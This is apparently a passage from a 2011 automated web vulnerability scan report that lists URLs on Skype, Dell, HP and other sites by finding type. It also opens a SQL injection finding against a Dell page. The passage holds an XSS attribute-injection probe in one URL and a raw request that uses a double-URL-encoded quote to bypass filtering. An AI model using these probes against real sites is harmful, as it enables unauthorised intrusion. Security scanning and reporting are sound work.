20.59. http://community.skype.com/t5/Deutsch/ct-p/de

20.60. http://community.skype.com/t5/Skype-auf-dem-Computer/ct-p/de_computer

20.61. http://community.skype.com/t5/Zahlungen-Rechnungen-Skype/bd-p/de_payment

20.62. https://developer.skype.com/javascripts/jquery/extensions/jquery.cookie.js

20.63. https://developer.skype.com/silk

20.64. https://developer.skype.com/support

20.65. https://developer.skype.com/support/

20.66. http://h30187.www3.hp.com/resources/scripts/controls.js

20.67. http://h30187.www3.hp.com/resources/scripts/dragdrop.js

20.68. http://h30187.www3.hp.com/resources/scripts/widget/util.js

20.69. http://heartbeat.skype.com/

20.70. http://i.dell.com/images/global/js/lib/jquery-1.2.2e.js

20.71. http://i2.msdn.microsoft.com/Hash/8c37ae5af06d04795b740449553e275e.js

20.72. http://lwn.net/Articles/456878/

20.73. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E

20.74. https://mid.live.com/si/login.aspx/x22

20.75. https://mid.live.com/si/login.aspx/x3c/cite/x3e/x3cspan

20.76. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html

20.77. http://radware.trk.sodoit.com/rts.js

20.78. https://secure.skypeassets.com//i/js/skype-common.js

20.79. https://secure.skypeassets.com/i/js/skype-common.js

20.80. http://shop.skype.com/apps/Business/Clownfish-for-Skype.html

20.81. http://shop.skype.com/apps/Business/Zaplee-Phone-System-In-The-Cloud.html

20.82. http://shop.skype.com/apps/Call-recording-audio-only/CallBurner-MP3-Call-Recorder.html

20.83. http://shop.skype.com/apps/Call-recording-audio-only/Pamela-Call-Recorder.html

20.84. http://shop.skype.com/apps/Call-recording-audio-only/Pamela-for-Skype-Basic-Edition.html

20.85. http://shop.skype.com/apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Basic-Version.html

20.86. http://shop.skype.com/apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Professional-Version.html

20.87. http://shop.skype.com/apps/Call-recording-audio-video/Evaer-video-recorder-for-Skype.html

20.88. http://shop.skype.com/apps/Call-recording-audio-video/VodBurner-Video-Call-Recorder.html

20.89. http://shop.skype.com/apps/Desktop-whiteboard-sharing/IDroo.html

20.90. http://shop.skype.com/apps/Desktop-whiteboard-sharing/InnerPass-Screen-Sharing.html

20.91. http://shop.skype.com/apps/Faxing/PamFax-for-Mac-OS-X.html

20.92. http://shop.skype.com/apps/Faxing/PamFax-for-Windows.html

20.93. http://shop.skype.com/apps/Integrations-with-popular-software/Skylook-for-MS-Outlook.html

20.94. http://shop.skype.com/apps/Mobile-video-communications/Qik-Video-for-Android.html

20.95. http://shop.skype.com/apps/Mobile-video-communications/Qik-Video-for-Apple.html

20.96. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0001/provided/j_global_slim/version/20110902073344.js

20.97. http://sj.wsj.net/djscript/require/j_global_slim/version/20110831104810.js

20.98. https://support.skype.com/en/faq/FA1170/How-can-I-contact-Skype-Customer-Service

20.99. http://welcome.hp-ww.com/country/us/en/styles/hpweb_styles_mac.css

20.100. http://welcome.hp-ww.com/js/hpweb_soctag.js

20.101. http://www.barracudanetworks.com/ns/js/wysiwyg/wysiwyg.js

20.102. http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml

20.103. http://www.cymphonix.com/2011-shaping-demo-sem.html

20.104. http://www.cymphonix.com/scripts/scriptaculous/controls.js

20.105. http://www.cymphonix.com/scripts/scriptaculous/dragdrop.js

20.106. http://www.google.com/search

20.107. http://www.hellobar.com/hellobar-5462-3430.js

20.108. http://www.hp.com/cma/metrics/survey/learningcenter.js

20.109. http://www.hp.com/cma/metrics/survey/lib/sup_class2.js

20.110. http://www.hp.com/cma/metrics/survey/na_num_clicks.js

20.111. http://www.imperva.com/js/lightbox.js

20.112. http://www.imperva.com/js/prototype.js

20.113. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx

20.114. http://www.radware.com/javascript/formRtns.js

20.115. http://www.skype.com/i/js/skype-common.js

20.116. http://www.skype.com/intl/en-us/features/allfeatures/skype-wifi

20.117. http://www.skype.com/intl/en-us/features/allfeatures/skype-wifi/

20.118. http://www.skype.com/intl/en/features/allfeatures/skype-wifi

20.119. http://www.skype.com/intl/en/features/allfeatures/skype-wifi/

20.120. http://www.skypeassets.com/i/js/skype-common.js

20.121. https://www.trustwave.com/

20.122. https://www.trustwave.com/js/jquery/hoverIntent.js

20.123. https://www.trustwave.com/web-application-firewall/

20.124. http://www.wallstreetoasis.com/files/js/js_0ab1e26fe2caa039c043f8d9dcf49447.js

21. Private IP addresses disclosed

21.1. http://connect.facebook.net/en_US/all.js

21.2. https://connect.facebook.net/en_US/all.js

21.3. http://www.facebook.com/extern/login_status.php

21.4. http://www.facebook.com/plugins/fan.php

21.5. http://www.facebook.com/plugins/like.php

21.6. http://www.facebook.com/plugins/like.php

22. Credit card numbers disclosed

22.1. http://googleads.g.doubleclick.net/pagead/ads

22.2. http://lwn.net/Articles/456878/

23. Robots.txt file

23.1. http://6a.typepad.com/.services/content

23.2. http://ad.adtegrity.net/pixel

23.3. http://ad.turn.com/server/pixel.htm

23.4. http://ad.yieldmanager.com/pixel

23.5. https://adwords.google.com/um/StartNewLogin

23.6. http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

23.7. http://altfarm.mediaplex.com/ad/ck/12309-80794-34740-0

23.8. http://apps.sapha.com/appshandler.php

23.9. http://apr.lijit.com///www/delivery/ajs.php

23.10. http://cdn.turn.com/server/ddc.htm

23.11. http://ce.lijit.com/merge

23.12. http://community.skype.com/t5/English/ct-p/English

23.13. http://content-cdn.dell.com/css/dyn/CSSC.aspx

23.14. http://content.dell.com/us/en/business/security-network.aspx

23.15. http://crl.geotrust.com/crls/secureca.crl

23.16. http://dce.sapha.com/engine.php

23.17. http://dell-bsd_us.baynote.net/baynote/tags3/policy

23.18. http://dell-global.baynote.net/baynote/tags3/common

23.19. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard

23.20. http://eas.apm.emediate.eu/eas

23.21. http://ecustomeropinions.com/survey/survey.php

23.22. http://embed.technorati.com/linkcount

23.23. http://fls.doubleclick.net/activityi

23.24. https://fls.doubleclick.net/activityi

23.25. http://gacela.eu/bb/mrcsrc/getpixel.php

23.26. https://h10078.www1.hp.com/

23.27. http://h10088.www1.hp.com/cda/gap/display/main/index.jsp

23.28. http://h20158.www2.hp.com/gms/ks/sq/

23.29. http://h20180.www2.hp.com/apps/Nav

23.30. http://h20219.www2.hp.com/services/us/en/business-it-services.html

23.31. http://h30261.www3.hp.com/phoenix.zhtml

23.32. http://h30434.www3.hp.com/psg

23.33. http://h30499.www3.hp.com/hpeb

23.34. http://h30501.www3.hp.com/hpsws

23.35. http://h30507.www3.hp.com/

23.36. http://h41174.www4.hp.com/4/hp/us/en/hho/post_sales/products/hub/|/r3990/|apps/nav/1684651975@x01,x02,x31,x32,x33,Top1,Top2,Top3,Top,Left1,Left2,Left3,x04,x41,x42,x43,x44,x45,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Frame1,Frame2,x11,x12,x13,x14,x15

23.37. http://h71028.www7.hp.com/enterprise/us/en/solutions/large-enterprise-business-solutions.html

23.38. http://h71036.www7.hp.com/hho/cache/252121-0-0-225-121.html

23.39. http://i.dell.com/images/global/general/doc-ready.gif

23.40. http://img-cdn.mediaplex.com/0/12309/universal.html

23.41. http://js.microsoft.com/library/svy/sto/broker-config.js

23.42. http://met1.hp.com/b/ss/hphqsearch/1/H.22.1/s31933527498040

23.43. http://metrics.skype.com/b/ss/skypeallprod/1/H.17/s33706402148852

23.44. http://microsoftsto.112.2o7.net/b/ss/msstomsdn,msstomsdnonly,msstomsdnmktenus,msstolibrollup,msstolibwebdev,msstouberie/1/H.20.3/s6623076066840

23.45. http://msdn.microsoft.com/en-us/library/ms533897(v=vs.85).aspx

23.46. http://now.eloqua.com/visitor/v200/svrGP.aspx

23.47. http://nsm.dell.com/b/ss/dellglobalonline/1/H.23.3/s3547971131745

23.48. http://pagead2.googlesyndication.com/pagead/imgad

23.49. http://pixel.33across.com/ps/

23.50. http://pixel.mathtag.com/event/js

23.51. http://pixel.quantserve.com/pixel/p-46B_c711bvEMM.gif

23.52. http://r.turn.com/r/beacon

23.53. http://rotation.linuxnewmedia.com/www/delivery/ajs.php

23.54. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYwdMDIIDWAyoo4-kAAP______________________________________________PzIJwekAAP____8D

23.55. http://safebrowsing.clients.google.com/safebrowsing/downloads

23.56. http://samples.msdn.microsoft.com/workshop/samples/author/dhtml/refs/insertScript_2.htm

23.57. http://search2.skype.com/search/search.cgi

23.58. https://secure.skype.com/account/login

23.59. https://secure.skypeassets.com/i/css/turbo/full.css

23.60. http://shop.skype.com/apps

23.61. http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js

23.62. https://support.skype.com/

23.63. http://sync.mathtag.com/sync/img

23.64. http://tag.admeld.com/ad/js/179/lijit/728x90/ros

23.65. http://translate.googleapis.com/translate_a/l

23.66. http://ui.skype.com/ui/0/5.5.0.114./en/getlatestversion

23.67. http://vap1den1.lijit.com/www/delivery/lg.php

23.68. http://vap1iad1.lijit.com/www/delivery/lg.php

23.69. http://vap1iad2.lijit.com/www/delivery/lg.php

23.70. http://vap1sfo1.lijit.com/www/delivery/lg.php

23.71. http://vap2den1.lijit.com/www/delivery/lg.php

23.72. http://vap2iad1.lijit.com/www/delivery/lg.php

23.73. http://vap3den1.lijit.com/www/delivery/lg.php

23.74. http://welcome.hp-ww.com/country/us/eng/js/hub/metrics.js

23.75. http://www-cdn.dell.com/content/public/menu.aspx

23.76. http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml

23.77. http://www.google.com/adsense/search/ads.js

23.78. http://www.googleadservices.com/pagead/aclk

23.79. http://www.hp.com/search/

23.80. http://www.ibm.com/favicon.ico

23.81. http://www.imiclk.com/cgi/r.cgi

23.82. http://www.imperva.com/products/wsc_web-application-firewall.html

23.83. http://www.lijit.com/delivery/fp

23.84. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx

23.85. http://www.radware.com/Resources/AppWallSolution.aspx

23.86. http://www.skype.com/go/registration

23.87. http://www.skypeassets.com/i/images/icons/favicon.ico

23.88. https://www.trustwave.com/web-application-firewall/

23.89. http://www.vodburner.com/affland.php

23.90. http://www.w3.org/TR/html5/dom.html

23.91. http://www.w3schools.com/js/js_ex_dom.asp

24. Cacheable HTTPS response

24.1. https://chat1.us.dell.com/netagent/cimlogin.aspx

24.2. https://developer.skype.com/

24.3. https://developer.skype.com/accessories

24.4. https://developer.skype.com/certification

24.5. https://developer.skype.com/certification/accessories

24.6. https://developer.skype.com/certification/certified-list

24.7. https://developer.skype.com/certification/odm-program

24.8. https://developer.skype.com/login

24.9. https://developer.skype.com/public/skypekit

24.10. https://developer.skype.com/public/skypekit/

24.11. https://developer.skype.com/signup

24.12. https://developer.skype.com/silk

24.13. https://developer.skype.com/skypekit/reference/cpp/index.html

24.14. https://developer.skype.com/skypekit/reference/java/index.html

24.15. https://developer.skype.com/skypekit/reference/python/index.html

24.16. https://developer.skype.com/support

24.17. https://developer.skype.com/support/

24.18. https://fls.doubleclick.net/activityi

24.19. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx

24.20. https://secure.skype.com/login

24.21. https://support.skype.com/de/

24.22. https://support.skype.com/en-us/

24.23. https://support.skype.com/en-us/category/ABOUT_SKYPE/

24.24. https://support.skype.com/en-us/category/AFFILIATE_PROGRAM/

24.25. https://support.skype.com/en-us/category/BANK_TRANSFERS/

24.26. https://support.skype.com/en-us/category/BIZ_VERSION/

24.27. https://support.skype.com/en-us/category/BLACKBERRY/

24.28. https://support.skype.com/en-us/category/BUYING_ACCESSORIES/

24.29. https://support.skype.com/en-us/category/CALLER_IDENTIFICATION/

24.30. https://support.skype.com/en-us/category/CALLING/

24.31. https://support.skype.com/en-us/category/CALLING_PHONES_SKYPEOUT/

24.32. https://support.skype.com/en-us/category/CALL_FORWARDING/

24.33. https://support.skype.com/en-us/category/CALL_QUALITY/

24.34. https://support.skype.com/en-us/category/CALL_TRANSFER/

24.35. https://support.skype.com/en-us/category/CONFERENCE_CALLING/

24.36. https://support.skype.com/en-us/category/CONNECTION_ISSUES/

24.37. https://support.skype.com/en-us/category/CONTACTS/

24.38. https://support.skype.com/en-us/category/CORDLESS_PHONES/

24.39. https://support.skype.com/en-us/category/CREDIT_CARDS/

24.40. https://support.skype.com/en-us/category/EXTRAS/

24.41. https://support.skype.com/en-us/category/FACEBOOK/

24.42. https://support.skype.com/en-us/category/FILE_TRANSFER/

24.43. https://support.skype.com/en-us/category/GIFT_CERTIFICATES/

24.44. https://support.skype.com/en-us/category/GIROPAY/

24.45. https://support.skype.com/en-us/category/GROUP_VIDEO_CALLING/

24.46. https://support.skype.com/en-us/category/INSTANT_MESSAGING_WITH_SKYPE/

24.47. https://support.skype.com/en-us/category/MONEYBOOKERS/

24.48. https://support.skype.com/en-us/category/MYSPACEIM_WITH_SKYPE/

24.49. https://support.skype.com/en-us/category/ONLINE_NUMBER_SKYPEIN/

24.50. https://support.skype.com/en-us/category/PAYMENT_PRICES/

24.51. https://support.skype.com/en-us/category/PAYPAL/

24.52. https://support.skype.com/en-us/category/PAYSAFECARD/

24.53. https://support.skype.com/en-us/category/PERSONALISE_SKYPE/

24.54. https://support.skype.com/en-us/category/PREPAID_CARDS/

24.55. https://support.skype.com/en-us/category/PRIVACY__SECURITY/

24.56. https://support.skype.com/en-us/category/PSP/

24.57. https://support.skype.com/en-us/category/PUBLIC_CHATS/

24.58. https://support.skype.com/en-us/category/SCREEN_SHARING/

24.59. https://support.skype.com/en-us/category/SC_CONFIG/

24.60. https://support.skype.com/en-us/category/SC_GETTING_STARTED/

24.61. https://support.skype.com/en-us/category/SC_PBX/

24.62. https://support.skype.com/en-us/category/SC_REQUIREMENTS/

24.63. https://support.skype.com/en-us/category/SC_TROUBLE/

24.64. https://support.skype.com/en-us/category/SEND_MONEY/

24.65. https://support.skype.com/en-us/category/SKYPEFIND/

24.66. https://support.skype.com/en-us/category/SKYPE_2_8_MAC_OR_BELOW/

24.67. https://support.skype.com/en-us/category/SKYPE_4_2_OR_BELOW/

24.68. https://support.skype.com/en-us/category/SKYPE_ACCESS/

24.69. https://support.skype.com/en-us/category/SKYPE_API/

24.70. https://support.skype.com/en-us/category/SKYPE_CALLS_FROM_BROWSERS/

24.71. https://support.skype.com/en-us/category/SKYPE_FOR_ANDROID/

24.72. https://support.skype.com/en-us/category/SKYPE_FOR_IPHONE/

24.73. https://support.skype.com/en-us/category/SKYPE_FOR_LINUX/

24.74. https://support.skype.com/en-us/category/SKYPE_FOR_MAC_OS_X/

24.75. https://support.skype.com/en-us/category/SKYPE_FOR_NOKIA_N800N810/

24.76. https://support.skype.com/en-us/category/SKYPE_FOR_NOKIA_N900/

24.77. https://support.skype.com/en-us/category/SKYPE_FOR_SYMBIAN/

24.78. https://support.skype.com/en-us/category/SKYPE_FOR_WEBOS/

24.79. https://support.skype.com/en-us/category/SKYPE_LITE/

24.80. https://support.skype.com/en-us/category/SKYPE_MANAGER_FOR_MEMBERS/

24.81. https://support.skype.com/en-us/category/SKYPE_ME/

24.82. https://support.skype.com/en-us/category/SKYPE_MOBILE_FOR_VERIZON/

24.83. https://support.skype.com/en-us/category/SKYPE_ON_AU/

24.84. https://support.skype.com/en-us/category/SKYPE_ON_TELUS/

24.85. https://support.skype.com/en-us/category/SKYPE_ON_THREE/

24.86. https://support.skype.com/en-us/category/SKYPE_ON_YOUR_TV/

24.87. https://support.skype.com/en-us/category/SKYPE_PRIME/

24.88. https://support.skype.com/en-us/category/SKYPE_PRO/

24.89. https://support.skype.com/en-us/category/SKYPE_SMS/

24.90. https://support.skype.com/en-us/category/SKYPE_TOOLBARS/

24.91. https://support.skype.com/en-us/category/SKYPE_TO_GO/

24.92. https://support.skype.com/en-us/category/SM_ACCOUNT_DETAILS/

24.93. https://support.skype.com/en-us/category/SM_FEATURES/

24.94. https://support.skype.com/en-us/category/SM_GETTING_STARTED/

24.95. https://support.skype.com/en-us/category/SM_MEMBERS/

24.96. https://support.skype.com/en-us/category/SM_PAYMENTS/

24.97. https://support.skype.com/en-us/category/SM_REPORTS/

24.98. https://support.skype.com/en-us/category/SUBSCRIPTIONS/

24.99. https://support.skype.com/en-us/category/TS_ACCOUNT/

24.100. https://support.skype.com/en-us/category/TS_INSTALL_UPGRADE/

24.101. https://support.skype.com/en-us/category/UKASH/

24.102. https://support.skype.com/en-us/category/VIDEO/

24.103. https://support.skype.com/en-us/category/VID_CALLING/

24.104. https://support.skype.com/en-us/category/VOICEMAIL/

24.105. https://support.skype.com/en-us/category/VOUCHERS/

24.106. https://support.skype.com/en-us/category/WINDOWS_MOBILE/

24.107. https://support.skype.com/en-us/category/YANDEX_MONEY/

24.108. https://support.skype.com/en-us/faq/FA10414/How-do-subscriptions-work

24.109. https://support.skype.com/en-us/faq/FA10416/Why-isn-t-my-subscription-working

24.110. https://support.skype.com/en-us/faq/FA109/I-ve-forgotten-my-password

24.111. https://support.skype.com/en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook

24.112. https://support.skype.com/en-us/faq/FA140/How-can-I-change-my-privacy-settings

24.113. https://support.skype.com/en-us/faq/FA331/What-is-an-Online-Number

24.114. https://support.skype.com/en-us/faq/FA351/How-can-I-pay-for-Skype-products

24.115. https://support.skype.com/en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype

24.116. https://support.skype.com/en-us/glossary

24.117. https://support.skype.com/en-us/search_first/

24.118. https://support.skype.com/en/

24.119. https://support.skype.com/en/category/BANK_TRANSFERS/

24.120. https://support.skype.com/en/category/BIZ

24.121. https://support.skype.com/en/category/CALL

24.122. https://support.skype.com/en/category/CREDIT_CARDS/

24.123. https://support.skype.com/en/category/GIFT_CERTIFICATES/

24.124. https://support.skype.com/en/category/GIROPAY/

24.125. https://support.skype.com/en/category/MESSAGING

24.126. https://support.skype.com/en/category/MONEYBOOKERS/

24.127. https://support.skype.com/en/category/PAY

24.128. https://support.skype.com/en/category/PAYMENT_PRICES/

24.129. https://support.skype.com/en/category/PAYPAL/

24.130. https://support.skype.com/en/category/PAYSAFECARD/

24.131. https://support.skype.com/en/category/PREPAID_CARDS/

24.132. https://support.skype.com/en/category/PRIVACY__SECURITY/

24.133. https://support.skype.com/en/category/PROD

24.134. https://support.skype.com/en/category/SKYPE_FOR_YOUR_MOBILE

24.135. https://support.skype.com/en/category/SUBSCRIPTIONS/

24.136. https://support.skype.com/en/category/TECH

24.137. https://support.skype.com/en/category/TS_ACCOUNT/

24.138. https://support.skype.com/en/category/UKASH/

24.139. https://support.skype.com/en/category/VID_CALL

24.140. https://support.skype.com/en/category/VOUCHERS/

24.141. https://support.skype.com/en/category/YANDEX_MONEY/

24.142. https://support.skype.com/en/faq/FA10184/How-do-I-create-a-Skype-account

24.143. https://support.skype.com/en/faq/FA10673/What-is-Skype-Home

24.144. https://support.skype.com/en/faq/FA109/I-ve-forgotten-my-password

24.145. https://support.skype.com/en/faq/FA1170/How-can-I-contact-Skype-Customer-Service

24.146. https://support.skype.com/en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile

24.147. https://support.skype.com/en/glossary

24.148. https://support.skype.com/en/search

24.149. https://support.skype.com/en/tips

24.150. https://www.trustwave.com/favicon.ico

25. HTML does not specify charset

25.1. http://ad.doubleclick.net/adi/interactive.wsj.com/newscolumns_businessstory

25.2. http://ad.doubleclick.net/adi/interactive.wsj.com/snippet_free_pass

25.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.4. http://fls.doubleclick.net/activityi

25.5. https://fls.doubleclick.net/activityi

25.6. http://h41105.www4.hp.com/m/us/en/index.xsl

25.7. http://h71028.www7.hp.com/enterprise/us/en/halo/index.html

25.8. http://h71036.www7.hp.com/hho/cache/252121-0-0-225-121.html

25.9. http://h71036.www7.hp.com/hho/cache/597818-0-0-225-121.html

25.10. http://i.dell.com/tlFramePage.htm

25.11. http://msite.martiniadnetwork.com/index/

25.12. http://now.eloqua.com/visitor/v200/svrGP.aspx

25.13. http://samples.msdn.microsoft.com/favicon.ico

25.14. http://tags.bluekai.com/site/4234

25.15. http://trk.etrigue.com/track.php

25.16. http://trk.roitrax.com/radware/rts.html

25.17. http://view.atdmt.com/CNT/iview/334305255/direct/01

25.18. http://view.atdmt.com/I36/iview/325171692/direct

25.19. http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp

25.20. http://www.vodburner.com/affland.php

25.21. http://www.w3schools.com/banners/aspallbannerframe.asp

25.22. http://www.w3schools.com/banners/aspallframe.asp

25.23. http://www.w3schools.com/js/tryit.asp

25.24. http://www.w3schools.com/js/tryit_view.asp

25.25. http://www.w3schools.com/jsref/demo_iframe.htm

25.26. http://www.w3schools.com/jsref/frame_a.htm

25.27. http://www.w3schools.com/jsref/frame_b.htm

25.28. http://www.w3schools.com/jsref/tryit.asp

25.29. http://www.w3schools.com/jsref/tryit_view.asp

26. Content type incorrectly stated

26.1. http://72d329.r.axf8.net/mr/a.gif

26.2. https://apps.skypeassets.com/static/skype.login/js/pwa-complete.js

26.3. https://apps.skypeassets.com/static/skype.login/js/wbr-complete.js

26.4. http://blogs.skype.com/comments.js

26.5. http://blogs.skype.com/en/bloggerbios.js

26.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs

26.7. http://catrg.peer39.net/251/161/1867330751

26.8. http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png

26.9. http://cs.wsj.net/community/content/images/misc/groups/politicscapitol.25x25.png

26.10. http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png

26.11. http://cymphonix.app3.hubspot.com/salog.js.aspx

26.12. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax

26.13. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard

26.14. http://h20180.www2.hp.com/favicon.ico

26.15. https://h41183.www4.hp.com/inflexion/scripts/lc-inflexion-lang.js

26.16. http://hplc-prod.s3.amazonaws.com/media/50480/photo_printer_64.jpg

26.17. http://hplc-prod.s3.amazonaws.com/media/50481/all_in_one_64.jpg

26.18. http://hplc-prod.s3.amazonaws.com/media/50482/ink_64.jpg

26.19. http://hplc-prod.s3.amazonaws.com/media/50483/desktops_64.jpg

26.20. http://hplc-prod.s3.amazonaws.com/media/50484/notebooks_64.jpg

26.21. http://hplc-prod.s3.amazonaws.com/media/50485/BN_scanners_64.jpg

26.22. http://hplc-prod.s3.amazonaws.com/media/50487/BN-mouse_key_usb_64.jpg

26.23. http://hplc-prod.s3.amazonaws.com/media/50488/Total_care_64.jpg

26.24. http://hplc-prod.s3.amazonaws.com/media/50581/TS_600t_64.jpg

26.25. http://msite.martiniadnetwork.com/index/

26.26. http://now.eloqua.com/visitor/v200/svrGP.aspx

26.27. http://online.wsj.com/djscript/latest/dojo/cldr/nls/en/number.js

26.28. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html

26.29. http://samples.msdn.microsoft.com/favicon.ico

26.30. http://search.dell.com/public/menu.aspx

26.31. http://search2.skype.com/search/bb-ratings.cgi

26.32. http://stream1d.radware.net/cdn/images/home/quicknav/ui-bg_glass_100_f6f6f6_1x400.png

26.33. http://stream1d.radware.net/cdn/images/home/quicknav/ui-bg_highlight-soft_100_eeeeee_1x100.png

26.34. http://stream1d.radware.net/cdn/images/home/quicknav/ui-icons_888888_256x240.png

26.35. http://trk.etrigue.com/track.php

26.36. http://twitter.com/statuses/user_timeline.json

26.37. http://www-cdn.dell.com/content/public/menu.aspx

26.38. http://www.cgisecurity.com/.services/json-rpc

26.39. http://www.cgisecurity.com/.shared/images/atpcomment-gradient.png

26.40. http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp

26.41. http://www.google.com/search

26.42. http://www.jdoasis.com/sites/all/themes/wso/images/logo.jpg

26.43. http://www.skype.com/etc/segmentation.segment.js

26.44. http://www.skype.com/intl/ar/_application/content/_footer/

26.45. http://www.skype.com/intl/cs/_application/content/_footer/

26.46. http://www.skype.com/intl/da/_application/content/_footer/

26.47. http://www.skype.com/intl/de/_application/content/_footer/

26.48. http://www.skype.com/intl/en-gb/_application/content/_footer/

26.49. http://www.skype.com/intl/en-us/_application/content/_footer/

26.50. http://www.skype.com/intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.js

26.51. http://www.skype.com/intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.results_true.js

26.52. http://www.skype.com/intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_europe.js

26.53. http://www.skype.com/intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_world.js

26.54. http://www.skype.com/intl/en/_application/content/_footer/

26.55. http://www.skype.com/intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.js

26.56. http://www.skype.com/intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.results_true.js

26.57. http://www.skype.com/intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_europe.js

26.58. http://www.skype.com/intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_world.js

26.59. http://www.skype.com/intl/es-es/_application/content/_footer/

26.60. http://www.skype.com/intl/es/_application/content/_footer/

26.61. http://www.skype.com/intl/et/_application/content/_footer/

26.62. http://www.skype.com/intl/fi/_application/content/_footer/

26.63. http://www.skype.com/intl/fr/_application/content/_footer/

26.64. http://www.skype.com/intl/hu/_application/content/_footer/

26.65. http://www.skype.com/intl/it/_application/content/_footer/

26.66. http://www.skype.com/intl/iw/_application/content/_footer/

26.67. http://www.skype.com/intl/ja/_application/content/_footer/

26.68. http://www.skype.com/intl/ko/_application/content/_footer/

26.69. http://www.skype.com/intl/lt/_application/content/_footer/

26.70. http://www.skype.com/intl/lv/_application/content/_footer/

26.71. http://www.skype.com/intl/nl/_application/content/_footer/

26.72. http://www.skype.com/intl/no/_application/content/_footer/

26.73. http://www.skype.com/intl/pl/_application/content/_footer/

26.74. http://www.skype.com/intl/pt-br/_application/content/_footer/

26.75. http://www.skype.com/intl/pt/_application/content/_footer/

26.76. http://www.skype.com/intl/ru/_application/content/_footer/

26.77. http://www.skype.com/intl/sv/_application/content/_footer/

26.78. http://www.skype.com/intl/tr/_application/content/_footer/

26.79. http://www.skype.com/intl/zh-Hans/_application/content/_footer/

26.80. http://www.skype.com/intl/zh-Hant/_application/content/_footer/

26.81. https://www.trustwave.com/favicon.ico

26.82. http://www.vodburner.com/favicon.ico

26.83. http://www.xg4ken.com/



1. SQL injection
There are 49 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://accessories.us.dell.com/sna/productdetail.aspx [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://accessories.us.dell.com
Path:   /sna/productdetail.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /sna/productdetail.aspx?sku= HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 25226
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:30:43 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:30:42 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
